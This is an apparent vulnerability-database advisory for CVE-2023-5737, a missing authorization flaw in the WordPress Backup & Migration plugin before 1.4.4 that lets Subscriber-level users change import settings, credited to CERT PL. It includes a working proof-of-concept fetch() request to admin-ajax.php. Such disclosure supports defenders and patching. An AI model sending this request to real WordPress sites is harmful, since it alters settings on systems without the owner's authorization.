WordPress Backup & Migration < 1.4.4 – Subscriber+ Plugin Settings Update | CVE 2023-5737 | Plugin Vulnerabilities

Description

The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=100&settings_data%5Bim_db_file_per_req%5D=200&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.

Affects Plugins

wp-migration-duplicator

Fixed in 1.4.4

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

c761c67c-eab8-4e1b-a332-c9a45e22bb13

Timeline

Publicly Published

2023-11-06 (about 2 years ago)

Added

2023-11-06 (about 2 years ago)

Last Updated

2023-11-06 (about 2 years ago)

Other

Published

Title

Published

2024-11-12

Title

Kognetiks Chatbot for WordPress < 2.1.8 - Missing Authorization to Authenticated (Subscriber+) Assistant Addition

Published

2024-12-06

Title

Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Settings Update / Data Access

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Arbitrary Plugin Activation

Published

2024-04-17

Title

Wp Ultimate Review < 2.3.0 - Unauthenticated Review Restriction Bypass

Published

2025-10-17

Title

Kognetiks Chatbot < 2.3.6 - Unauthenticated Limited File Uploads and Conversation Erasing